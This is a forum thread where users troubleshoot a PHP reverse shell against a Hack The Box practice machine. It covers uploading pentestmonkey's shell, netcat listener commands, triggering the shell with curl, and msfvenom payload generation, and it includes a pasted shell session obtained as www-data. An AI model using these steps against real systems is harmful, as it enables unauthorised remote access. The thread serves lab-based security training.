php-reverse-shell.php issue

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened and then when I exited it would say “exploit successful. No session created”

Hello Everyone,

I got the same problems I tried to go through everything and I made it in the end :smiley: , so this will help you troubelshoot the issue and try everything :

  1. Before uploading php-reverse-shell.php to the targe, first of all modify the IP address and put the one that was assigned to you through your connection to the Hackthebox network it start with 10.10.14. and you can find it using either “ifconfig” or "ip a " command. About the port number you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it and to “33456” instead

  2. Now you modified the file, you uploaded to the web server and you got that message on the web broser that your file is uploaded. CONGRATS !! here’s the critical part :

  3. first of all run the nc command “nc -lvnp 33456” and before run it check that the firewall is disabled using the command “ufw status”

  4. Now you’re listening on the port 33456 and you’re waiting for the machine to reverse connect you , you invoke the event by running the curl command (make sure that your filename is right)

  5. normally in this case you should see on the terminal where you executed the “nc” command that you get a little $ to run your command and that the connection is established

There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address it must be the tun0 interface and try listening via nc -lvvp 1234

2 Likes

@SalahEo said:
There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

1 Like

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like does that server speak php? If so you are only going to upload error messages-- not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.

1 Like

Heya, i am facing the same issue.
-My tun0 interface ip is 10.10.14.23
-no firewall is up at machine or network level
-no port redirection for 8443
-my vpn is up and running (i can ping and access the oopsie machine)
-i have successfully uploaded a reverseshell.php and set up the ip 10.10.14.23 ip, and port 8443
-i am listening to port 8443
nc -lvnp 8443
listening on [any] 8443 …

-and when i execute the shell i got
[~/HTB/Oopsie]
└─$ curl http://10.10.10.28/uploads/reverseshelltest.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection refused (111)

I am really trying to see what is causing this , no more hint so far :frowning:

PS: btw, for those who get a 404 error the files are deleted every X minutes so you should upload it again

Hello,

You probable use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete extension of a php file, than transfers it to the victim machine and add the .php extension after. Normally it should work.

Just a quick follow up: this was due to the the duration of the vpn tunnel somehow, it had been running al night , i have closed it. regenerate the access pack and got the same workflow running at the same time. Not sure exactly what (a time out? a token? …) but at least i was able to complete it!

Type your comment> @Vetka said:

Hello,

You probable use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete extension of a php file, than transfers it to the victim machine and add the .php extension after. Normally it should work.

How would you do that? I have the same problem?

Did you check the local firewall is running? I stop this and found webshell.

So, i had this in my ifconfig command:

<snip>

tun1: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet <ip>  netmask 255.255.254.0  destination <desip>
        inet6 dead:<ip6>  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::<ipv6>  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 100 
</snip>

and i used the ip given in inet as the ip to be provided in the script with port 1234 and i got the reverse shell… I think it’s the Ip tunnel that is being shown as my external Ip or something to hide the Internal Ip

in my case there are two “tun0” and “tun1” . Put one of the ip in php-reverse-shell.php file
this work for me.

���������(krish500���DESKTOP-18BPFD5)-[/usr/share/webshells]
������$ sudo nc -lnvp 8443
[sudo] password for krish500:
listening on [any] 8443 …
connect to [10.10.14.179] from (UNKNOWN) [10.129.112.164] 58646
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:24:20 up 1:56, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ ls
bin
boot
cdrom
dev
etc
home
initrd.img

Hi guys.
I want to help you solve the problem with the Kali machine.
I myself have encountered this problem many times, but every time the task arose to attack a virtual server from my Kali machine, I always put off decisions for later, because I could not decide quickly.
If you are using the pwnbox virtual machine, then things are much simpler. You simply prescribe ip not of the network interface, but of the vpn connection. As has been written here many times.
But what if you are using your local Kali machine.
First, I would like you to think about how does your Kali machine know the route through the VPN tunnel?
Not like. You need a route from your kali machine to the attacked pwnbox server through a vpn tunnel.
The easiest way is to set up an open VPN on your Kali machine.
This can be done very quickly with the command
sudo apt-get update
sudo apt-get install openvpn network-manager
After that, you download the configuration file and create a new VPN interface in the settings of the Kali machine, where you import the configuration file without specifying a login and password!
That’s it - now you start a new VPN and everything should work.
When setting up the shell, you specify the VPN connection ip !!! instead of ip of your network interface!!!
Be sure to make sure that you have 2 interfaces enabled, 1 - your network interface for Internet access, and 1 new VPN interface for connecting to the pwnbox network.
Good luck.
Create a VPN connection
Sorry for the screenshots in this resolution. did it quickly.





1 Like

We check that 2 interfaces were included!!!

That is because the docker machine is using a public ip and if you use your private IP like 10.10.15… is not going to work.

We have to reverse the shell to a public IP and do a Port Fowarding or use a service like ngrok.

I tried to use ngrok btw but didn’t work.

On HTB Academy for example the exercise is using public ip depends on your case

That works because the your target machine is on the same VLAN as your attack machine

Well it took me a couple of hours to figure out a solution for that issue , hope it will help anyone.
So I just started doing stuff with htb lately but I had done reverse shells before with nc and never had a problems till now , vpn , network , ips, ports everything was ok but yet , its not working.
Wondring the space of the internet led me to some topics and advices but none seems to help , I knew that my journey with htb would be worthless without having the ability to use a reverse shell,I almost gave up after spending all night on this , but the next day…

SOLUTION > it seems that for some the well known php shells you can grab from github ( and there arent many for my surprise) wont do the trick and wont work , so I went and used msfvenom to generate a shell payload ( PHP Reverse Shell with Metasploit ) for php@htb you will have to use php/reverse_php( PHP Command Shell, Reverse TCP (via PHP) - Metasploit - InfosecMatter) for the simplicity and for the final size, once you have this shell running and connected to the victim from msfconsole run the nc command to make a connection from the shell back to your nc listner ( listen on your end befroe and use a random port at least as 5 chars ex 55433 ) and you shall have a new connection on nc now and happy hacking.

It worked for me broo…
Thanks…!!

Check payload mentioned in php reverse shell script, it is possible that payload in script is for another os then one your targeting on box